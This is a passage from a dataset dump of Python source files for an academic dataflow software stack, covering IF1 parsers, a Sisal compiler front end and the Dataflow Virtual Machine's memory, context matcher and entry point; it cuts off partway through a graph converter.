"267dd4fb7f816ff9a742f2c1c19524cda8a0196e", "content_id": "4bb5b6e0ed544e95c0c1406e1079a153cb445326", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3043, "license_type": "no_license", "max_line_length": 79, "num_lines": 111, "path": "/DISc/frontEnd/IF1/edge.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# edge.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.edge\n# \\brief Parse edges and literalss\n# \n# This module is responsible for parsing \n# IF1 edges and literals and adding them to \n# the IGR.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\nimport IGR\nimport IGR.node\n\nimport environment\nimport type\n\n# --------- #\n# Constants #\n# --------- #\n\n# E <source_node> <port> <destination_node> <port> <type>\n_e_src_idx = 1\n_e_srcp_idx = 2 \n_e_dst_idx = 3\n_e_dstp_idx = 4\n_e_type_idx = 5\n\n# L destination_node port type string \n_l_dst_idx = 1\n_l_dstp_idx\t= 2\n_l_type_idx = 3\n_l_str_idx = 4\n\n# ----------- #\n# Edge Parser #\n# ----------- #\n\n## Parse an IF1 edge \ndef parseEdge(arr, ctr):\n\tsrcLabel = int(arr[_e_src_idx])\n\tdstLabel = int(arr[_e_dst_idx])\n\tsrcPort = int(arr[_e_srcp_idx]) - 1\n\tdstPort\t = int(arr[_e_dstp_idx]) - 1\n\tsrcNode = environment.getNode(srcLabel)\n\tdstNode = environment.getNode(dstLabel)\n\n\tIGR.connect(srcNode, srcPort, dstNode, dstPort)\n\n# -------------- #\n# Literal Parser #\n# -------------- #\n\n## Parse a literal string that represents a basic type\ndef _parseBasicLit(str, typ, ctr):\n\tif typ.type is int:\n\t\treturn int(str)\n\telif typ.type is bool:\n\t\treturn str is \"T\"\n\telse:\n\t\tlog.error(\"Line %d, Unsupported literal, %s encountered.\", ctr, str)\n\n## Parse a literal string.\ndef _parseLitStr(str, typ, ctr):\n\tstring = str[1:-1] #strip enclosing \"\"\n\tif isinstance(typ, type._BasicType):\n\t\treturn _parseBasicLit(string, typ, ctr)\n\telif isinstance(typ, type._FunctionType):\n\t\treturn string\n\telse:\n\t\tlog.error(\"Line %d, Unsupported literal, %s encountered.\", ctr, str)\n\n## Parse an IF1 literal\ndef parseLiteral(arr, ctr):\n\tlabel = int(arr[_l_dst_idx])\n\tport = int(arr[_l_dstp_idx]) - 1\n\ttypeKey = int(arr[_l_type_idx])\n\tstring = arr[_l_str_idx]\n\n\tnode = environment.getNode(label)\n\ttyp = type.getType(typeKey)\n\tval = _parseLitStr(string, typ, ctr)\n\n\tIGR.addLiteral(val, node, port)" }, { "alpha_fraction": 0.7269613146781921, "alphanum_fraction": 0.7321000099182129, "avg_line_length": 28.484848022460938, "blob_id": "d84b814176a22844a0172b001eeffe8022bc33a0", "content_id": "0b9833a5a8982cab3fa321c8eebcd8922a36d0f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2919, "license_type": "no_license", "max_line_length": 79, "num_lines": 99, "path": "/DVM/core/memory.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# memory.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.memory\n# \\brief DVM instruction memory\n#\n# This module defines the instruction memory\n# the instruction memory stores all the instructions in the program.\n##\n\n##\n# The Instruction memory stores all of the \n# instructions in the program.\n#\n# An instruction memory is divided into chunks.\n# each of these chunks stores instructions with \n# certain properties. The exact properties are\n# determined by the outside world.\n##\nclass InstructionMemory(object):\n\n\t##\n\t# Initialize the memory.\n\t#\n\t# \\param chunks\n\t#\t\tThe amount of chunks this memory contains.\n\t##\n\tdef __init__(self, chunks):\n\t\tsuper(InstructionMemory, self).__init__()\n\t\tself.memory = [[] for i in xrange(0, chunks)]\n\n\t##\n\t# Add an instruction to the memory.\n\t##\n\tdef add(self, inst):\n\t\tkey = (inst.chunk, len(self.memory[inst.chunk]))\n\t\tlst = self.memory[inst.chunk]\n\t\tlst.append(inst)\n\t\tinst.setKey(key)\n\t\treturn key\n\n\t##\n\t# Get an instruction from memory.\n\t##\n\tdef get(self, key):\n\t\treturn self.memory[key[0]][key[1]]\n\n## Main instance of the instruction memory\n__MEMORY__ = InstructionMemory(2)\n\n## Get a reference to the instruction memory\ndef memory(): return __MEMORY__\n\n## Delete all the contents of the instruction memory.\ndef reset(): \n\tglobal __MEMORY__ \n\t__MEMORY__= InstructionMemory(2)\n\n## Get an instruction from the main memory\ndef get(key): return memory().get(key)\n\n## Add an instruction to the main memory.\ndef add(inst): \n\treturn memory().add(inst)\n\n## \n# See if an instruction needs to pass the matcher\n# Instructions that require a context manager are stored\n# in a separate part of the memory, so checking the key suffices.\n#\n# \\param key\n#\t\tThe key of the instruction \n# \\return \n#\t\tTrue if the instruction needs to be matched.\ndef needsMatcher(key): return key[0] is 1\n" }, { "alpha_fraction": 0.7305361032485962, "alphanum_fraction": 0.7375291585922241, "avg_line_length": 30.101449966430664, "blob_id": "5fb6ce864d6c8063bee1ee6444501aad7370adb5", "content_id": "a099b2bb7293a24cc6d7da3825d8dd1c465f4dd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2145, "license_type": "no_license", "max_line_length": 79, "num_lines": 69, "path": "/DISc/frontEnd/Sisal.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# __init__.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nimport subprocess\nimport tempfile\nimport IF1\nimport sys\nimport os\n\nimport logging\nlog = logging.getLogger(__name__)\n\n##\n# \\package frontEnd.Sisal\n# \\author Mathijs Saey\n# \n# \\brief DISc Sisal FrontEnd.\n#\n# This module calls sisalc (has to be in your path), and uses the IF1\n# frontend to parse the results.\n#\n# Since Sisalc seems to be unable to accept input from stdin, we use\n# temporary files to interact with Sisal. \n##\n\ndef fromString(str):\n\t# Create a temp file and run sisalc on it\n\tfile = tempfile.NamedTemporaryFile(suffix = '.sis', prefix = 'DIScTmp')\n\tname = file.name\n\tfile.write(str)\n\tfile.flush()\n\n\ttry:\n\t\tFNULL = open(os.devnull, 'w')\n\t\tsubprocess.check_call([\"sisalc\", \"-IF1\", name], stdout = FNULL)\n\texcept subprocess.CalledProcessError:\n\t\tlog.error(\"Error while compiling Sisal file!\")\n\t\tsys.exit(1)\n\n\t# Get the name of the output file\n\tname = name.replace('.sis', '.if1')\n\n\t# Open the file and run the IF1 frontend on it.\n\tfile = open(name)\n\tIF1.fromString(file.read())\n\tfile.close()" }, { "alpha_fraction": 0.6492267847061157, "alphanum_fraction": 0.6565977931022644, "avg_line_length": 24.72490692138672, "blob_id": "9e064229ac4b8805dd65f5a9c02e8ef410385457", "content_id": "7210eaecf47f2a34a26ba02cd252b3d2035d3613", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6919, "license_type": "no_license", "max_line_length": 79, "num_lines": 269, "path": "/DISc/frontEnd/IF1/type.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# type.py\n# Mathijs Saey\n# DISc\n\t\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package frontEnd.IF1.type\n# \\brief Type parser\n# \n# Discover IF1 types.\n# For an introduction on how types are represented in\n# IF1, check out the [IF1 reference](md_doc__i_f1.html#types)\n##\n\nimport logging\n# Logging levels do not propagate decently for some reason\n# if the name contains .IF1\nlog = logging.getLogger('frontEnd.IF1_type')\n\n# -------------------- #\n# Forward declarations #\n# -------------------- #\n\ndef _Tag(arr): \t\t_parseTag(arr) \t\ndef _Tuple(arr): \t_parseTuple(arr) \ndef _Union(arr): \t_parseUnion(arr) \ndef _Array(arr): \t_parseArray(arr) \ndef _Basic(arr): \t_parseBasic(arr) \ndef _Field(arr): \t_parseField(arr) \ndef _Record(arr): \t_parseRecord(arr) \ndef _Stream(arr): \t_parseStream(arr) \ndef _Function(arr): _parseFunction(arr)\ndef _Multiple(arr): _parseMultiple(arr)\n\n# --------- #\n# Constants #\n# --------- #\n\n# T <label> <type_code> <arg_1> <arg_2>\n_label_idx \t= 1 \n_code_idx \t= 2\n_arg_1_idx \t= 3\n_arg_2_idx \t= 4\n\n## The function that is needed to parse a given idx\n_type_codes = {\n\t 0 : _Array,\n\t 1 : _Basic,\n\t 2 : _Field,\n\t 3 : _Function,\n\t 4 : _Multiple,\n\t 5 : _Record,\n\t 6 : _Stream,\n\t 7 : _Tag,\n\t 8 : _Tuple,\n\t 9 : _Union\n}\n\n## Basic type codes and the python types to match them\n_basic_types = {\n\t0 : bool,\n\t1 : str, # Python has no built-in charachter\n\t2 : float,\n\t3 : int,\n\t4 : None,\n\t5 : float,\n\t6 : str\n\t#6 : WildBasic \tType not mentioned in the reference manual\n}\n\n# ------------------- #\n# Type representation #\n# ------------------- #\n\nclass _Type(object): pass\n\n##\n# Represents any possible type\n##\nclass _UnknownType(_Type):\n\tdef __init__(self):\n\t\tsuper(_UnknownType, self).__init__()\n\t\tself.list = []\n\t\tself.type = None\n\n\tdef __str__(self):\n\t\treturn \"Unknown Type\"\n\n##\n# Represents one of the basic IF1 types.\n##\nclass _BasicType(_Type):\n\tdef __init__(self, type):\n\t\tsuper(_BasicType, self).__init__()\n\t\tself.type = type\n\n\tdef __str__(self):\n\t\treturn \"Basic Type: \" + str(self.type)\n\n##\n# Wrapper around a container that contains\n# a single base type (such as an array)\n##\nclass _ContainerType(_Type):\n\n\tdef __init__(self, baseType, containerType):\n\t\tsuper(_ContainerType, self).__init__()\n\t\tself.base = baseType\n\t\tself.container = containerType\n\n\tdef __str__(self):\n\t\treturn \"Container: \" + self.container + \" \" + self.base.__str__()\n\n##\n# Wrapper around a combined type that contains multiple base types\n#\n# The wrapper represents the full type starting at it's index.\n# So if we have a tuple (int, str, int), then we would have 3\n# _CombinedType instances, one that represents the full type,\n# one that represents (str, int) and one that represents (int).\n##\nclass _CombinedType(_Type):\n\tdef __init__(self, type, containerType, next = None):\n\t\tsuper(_CombinedType, self).__init__()\n\t\tself.type = containerType\n\t\tself.list = [type]\n\t\tif next:\n\t\t\tself.list += next.list\n\n\tdef __str__(self):\n\t\tres = \"Combined: (\" + self.type + \")\"\n\t\tfor el in self.list:\n\t\t\tres += \" <\" + str(el) + \">\"\n\t\treturn res\n\n##\n# Wrapper around a pointer to the first element of a combined type\n##\nclass _PointerType(_Type):\n\tdef __init__(self, dest, containerType):\n\t\tsuper(_PointerType, self).__init__()\n\t\tself.type = containerType\n\t\tself.dest = dest\n\n\tdef __str__(self):\n\t\treturn \"Pointer: (\" + self.type + \"): \" + self.dest\n\n\tdef follow(self):\n\t\treturn getType(self.dest)\n\n##\n# Wrapper around a function type\n##\nclass _FunctionType(_Type):\t\n\tdef __init__(self, args, res):\n\t\tsuper(_FunctionType, self).__init__()\n\t\tself.args = args\n\t\tself.res = res\n\n\tdef __str__(self):\n\t\tres = \"Function: \\n\"\n\t\tres += \"\\t arg: \" + str(self.args) + \"\\n\"\n\t\tres += \"\\t res: \" + str(self.res)\n\t\treturn res\n\n# --------- #\n# Type Pool #\n# --------- #\n\n##\n# Store all the encountered types\n##\nclass _TypePool(object):\n\tdef __init__(self):\n\t\tsuper(_TypePool, self).__init__()\n\t\tself._type_pool = {0 : _UnknownType()}\n\n\tdef __str__(self):\n\t\tres = \"Type pool:\\n\"\n\t\tfor key, value in self._type_pool.iteritems():\n\t\t\tres += \"\\t\" + str(key) + \": \" + str(value) + \"\\n\"\n\t\treturn res\n\n\tdef addType(self, arr, type):\n\t\tkey = int(arr[_label_idx])\n\t\tself._type_pool.update({key : type})\n\n\tdef getType(self, key):\n\t\treturn self._type_pool[int(key)]\n\n_pool = _TypePool()\n\n##\n# Get a type from the pool\n##\ndef getType(label):\n\treturn _pool.getType(label)\n\n# ------ #\n# Parser #\n# ------ #\n\ndef parseType(arr, ctr):\n\tfuncKey = int(arr[_code_idx])\n\ttry:\n\t\tfunc = _type_codes[funcKey]\n\texcept KeyError:\n\t\tlog.warning(\"Line %d, Unknown type code %s encountered.\", ctr, funcKey)\n\t\t_pool.addType(arr, _UnknownType())\n\telse:\n\t\tfunc(arr)\n\ndef _parseBasic(arr):\n\tbase_type = _basic_types[int(arr[_arg_1_idx])]\n\t_pool.addType(arr, _BasicType(base_type))\n\ndef _parseFunction(arr):\n\targs = getType(arr[_arg_1_idx])\n\tres = getType(arr[_arg_2_idx])\n\t_pool.addType(arr, _FunctionType(args, res))\n\ndef _parseContainer(arr, container):\n\tbase_type = getType(arr[_arg_1_idx])\n\t_pool.addType(arr, _ContainerType(base_type, container))\n\ndef _parseCombinedPtr(arr, container):\n\tdest = arr[_arg_1_idx]\n\t_pool.addType(arr, _PointerType(container, dest))\n\ndef _parseCombined(arr, container):\n\tbaseType = getType(arr[_arg_1_idx])\n\t\n\t# Add the new type, if there is a previous, link to it\n\ttry:\n\t\tnext = getType(arr[_arg_2_idx])\n\texcept KeyError:\n\t\t_pool.addType(arr, _CombinedType(baseType, container))\n\telse:\n\t\t_pool.addType(arr, _CombinedType(baseType, container, next))\n\ndef _parseTag(arr): \t\t_parseCombined(arr, \"tag\")\ndef _parseTuple(arr): \t\t_parseCombined(arr, \"tuple\")\ndef _parseField(arr): \t\t_parseCombined(arr, \"field\") \ndef _parseArray(arr):\t\t_parseContainer(arr, \"array\")\ndef _parseStream(arr):\t\t_parseContainer(arr, \"stream\")\ndef _parseMultiple(arr):\t_parseContainer(arr, \"multiple\")\ndef _parseUnion(arr):\t\t_parseCombinedPtr(arr, \"Union\") \ndef _parseRecord(arr): \t\t_parseCombinedPtr(arr, \"Record\")" }, { "alpha_fraction": 0.675000011920929, "alphanum_fraction": 0.6797727346420288, "avg_line_length": 25.829267501831055, "blob_id": "b8b4f15b2ef8d040c3c98bcc4e30c43406345a07", "content_id": "44b75e710056ebb15980337839fd2d5007cec99e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4400, "license_type": "no_license", "max_line_length": 79, "num_lines": 164, "path": "/DVM/core/contextMatcher.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# contextMatcher.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package core.contextMatcher\n# \\brief DVM context matcher\n# \n# This module defines the DVM context matcher.\n##\n\nimport logging\nlog = logging.getLogger(__name__)\n\n##\n# DVM Context matcher.\n#\n# The matcher is responsible for gathering inputs \n# to the same instruction based on their contexts.\n# The matcher should forward these tokens to the scheduler once\n# that all of the inputs for a given context are available.\n#\n# The matcher utilizes <i>(instruction, context)</i> pairs as **keys**\n##\nclass ContextMatcher(object):\n\n\t##\n\t# Initialize a context matcher.\n\t#\n\t# \\param core\n\t#\t\tThe runtime core that this matcher\n\t#\t\tis a part of.\n\t##\n\tdef __init__(self, core):\n\t\tsuper(ContextMatcher, self).__init__()\n\n\t\t## Dictionary that contains the tokens for all the keys\n\t\tself.tokens = {}\n\n\t\t## Reference to the DVM::Core\n\t\tself.core = core\n\n\t##\n\t# Dynamically set the amount\n\t# of tokens a certain instruction should receive.\n\t#\n\t# \\param inst\n\t#\t\tThe address of the instruction to set the token amount for.\n\t# \\param cont\n\t#\t\tThe context for which this amount is valid. \n\t# \\param amount\n\t#\t\tThe amount of tokens this matcher requires for this key.\n\t##\n\tdef setKey(self, inst, cont, amount):\n\t\tkey = (inst, cont)\n\n\t\tarr = [None] * amount\n\t\tself.tokens.update({key : [arr, 0, amount]})\n\n\t##\n\t# See if a given key is already a part of the \n\t# tokens we are matching.\n\t# \n\t# Create an array to match these tokens if it's not.\n\t#\n\t# \\param key\n\t#\t\tThe key to check\n\t##\n\tdef checkKey(self, key):\n\t\tif key not in self.tokens:\n\t\t\tinst = self.core.memory.get(key[0])\n\t\t\tarr = [None] * inst.totalInputs\n\t\t\tinp = inst.realInputs\n\t\t\tself.tokens.update({key : [arr, 0, inp]})\n\n\t##\n\t# Update the token array for a key\n\t# This method assumes that there is an array for the\n\t# given key.\n\t#\n\t# \\param key\n\t#\t\tThe key to find the array we want to update.\n\t# \\param port\n\t#\t\tThe destination port of the token we want to add.\n\t# \\param token\n\t#\t\tThe token we want to add.\n\t##\n\tdef updateKeyArr(self, key, port, token):\n\t\tpair = self.tokens[key]\n\t\tif not pair[0][port]:\n\t\t\tpair[0][port] = token\n\t\t\tpair[1] += 1\n\t\telse:\n\t\t\tlog.warning(\"Duplicate token received!\")\n\n\t##\n\t# See if all the input tokens are present\n\t# for a given key.\n\t#\n\t# \\param key\n\t#\t\tThe key to check\n\t# \n\t# \\return \n\t#\t\tTrue if all the input tokens are present for key.\n\t##\n\tdef isKeyReady(self, key):\n\t\tpair = self.tokens[key]\n\t\treturn pair[1] == pair[2]\n\n\t##\n\t# Add the tokens for key to the scheduler.\n\t##\n\tdef executeKey(self, key):\n\t\tlog.info(\"Executing key: (%s, %s)\", key[0], key[1])\n\t\tarr = self.tokens[key][0]\n\t\tdel self.tokens[key]\n\t\tself.core.scheduler.schedule(key[0], arr)\n\n\t## \n\t# Add a token to the matcher\n\t# \n\t# This method can be seen as the main method of the\n\t# matcher as it utilizes all the other methods to define\n\t# the behaviour that the matcher will use when a token is added.\n\t#\n\t# \\param token\n\t#\t\tthe token to add.\n\t##\n\tdef add(self, token):\n\t\tlog.info(\"Adding token: %s\", token)\n\n\t\ttag = token.tag \n\t\tinst = tag.inst \n\t\tcont = tag.cont \n\t\tport = tag.port \n\t\tkey = (inst, cont)\n\n\t\tself.checkKey(key)\n\t\tself.updateKeyArr(key, port, token)\n\n\t\tif self.isKeyReady(key):\n\t\t\tself.executeKey(key)\n" }, { "alpha_fraction": 0.6973100304603577, "alphanum_fraction": 0.7014886140823364, "avg_line_length": 29.157480239868164, "blob_id": "b9bd2fc8bcd32a65bd63159c5cd6f1d173e39632", "content_id": "7ce04a675f7a0fb4b70fd519012801cea292fd7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3829, "license_type": "no_license", "max_line_length": 128, "num_lines": 127, "path": "/DVM/dvm.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n# main.py\n# Mathijs Saey\n# DVM\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package dvm\n# \\brief DVM Main file\n#\n# This module contains the entry point for DVM. It contains the\n# UI code, as well as the command line parser and exit handling.\n#\n# In short it bundles all the components of DVM together and it \n# allows the user to interact with these components.\n##\n\nimport log\nimport sys\nimport dot\nimport core\nimport read\nimport user\nimport signal\nimport argparse\nimport fileinput\nimport multiprocessing\n\n# --------------- #\n# Signal Handlers #\n# --------------- #\n\n## Handle an exit signal.\ndef handle_exit(signal, frame):\n\tsys.exit(user.EXIT_INTERRUPT)\n\n## Bind handle_exit to sigint.\nsignal.signal(signal.SIGINT, handle_exit)\n\n# ---------------------- #\n# Command line arguments #\n# ---------------------- #\n\nargParser = argparse.ArgumentParser(description = \"The Dataflow Virtual Machine.\")\nargParser.add_argument(\"path\", help = \"The path to the DIS file you want to run, - to use stdin\")\nargParser.add_argument(\"-i\", \"--input\", action = 'append', help = \"A value to pass to the program\")\nargParser.add_argument(\"-c\", \"--cores\", type = int, default = multiprocessing.cpu_count(), help = \"The number of cores to use\")\nargParser.add_argument(\"-ll\", \"--logLevel\", type = int, default = 50, help = \"Specify the log level\")\nargParser.add_argument(\"--dot\", action = \"store_true\", help = \"Generate a dot graph of the program\")\nargParser.add_argument(\"--dry_run\", action = \"store_true\", help = \"Don't run the program but abort after parsing the dis file.\")\n\nargs = argParser.parse_args()\n\n#args.logLevel = 0\n#args.path = \"../test/simple.dis\"\n#args.cores = 1\n#args.input = [\"1\",\"2\", \"3\", \"4\"]\n\n# ------------ #\n# Program Flow #\n# ------------ #\n\n# Set up logging.\nlog.setup(args.logLevel)\n\n# Parse the input files/stdin.\nfor line in fileinput.input(args.path):\n\tread.parseLine(line)\n\n# Generate a dot graph of the program\nif args.dot:\n\tdot.dot()\n\n# Abort if dry_run was specified.\nif args.dry_run:\n\tsys.exit(user.EXIT_OK)\n\n# Abort if we need extra input while \n# stdin is already bound to a pipe.\nif args.path == \"-\":\n\tif core.getIn() != len(args.input):\n\t\tprint \"Missing input, aborting...\"\n\t\tsys.exit(user.EXIT_INPUT)\n\n# Print the header text:\nif sys.stdout.isatty():\n\tprint \"DVM running on {} core(s).\".format(args.cores)\n\n# Start the cores.\ncore.start(args.cores)\n\n# Add command line arguments to runtime.\nif args.input:\n\tfor data in args.input:\n\t\tdata = read.parseValue(data)\n\t\tcore.addData(data)\n\n# Fetch the remaining input\nwhile not core.hasIn():\n\tif sys.stdin.isatty():\n\t\tdata = raw_input(\"> \")\n\telse:\n\t\tdata = raw_input(\"reading input for port {}...\\n\".format(core.getPort()))\n\tdata = read.parseValue(data)\n\tcore.addData(data)" }, { "alpha_fraction": 0.7279291152954102, "alphanum_fraction": 0.7331801652908325, "avg_line_length": 26.214284896850586, "blob_id": "42d015cd20fe94a22e0c4bb56405953f49dbd457", "content_id": "ab982af39ecbeefab7c947e14586459c1106e32b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3047, "license_type": "no_license", "max_line_length": 83, "num_lines": 112, "path": "/DISc/backEnd/DVM/graphConverter.py", "repo_name": "mathsaey/Dataflow-Software-Stack", "src_encoding": "UTF-8", "text": "# graphConverter.py\n# Mathijs Saey\n# DISc\n\n# The MIT License (MIT)\n#\n# Copyright (c) 2013, 2014 Mathijs Saey\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n# \n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n# \n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n##\n# \\package backEnd.DVM.graphconverter\n# \\brief IGR graph converter\n#\n# This module converts the entire graph\n# into DVM.\n#\n# \\todo\n#\tClean this up \n#\t\t- cleaner abstraction for not using first subgraph\n#\t\t- Type check for compound node type.\n##\n\nimport IGR\nimport dis\nimport IGR.node\nimport nodeConverter\nimport compoundConverter\n\n##\n# Add the contents of a collection of subGraphs\n# to a DIS 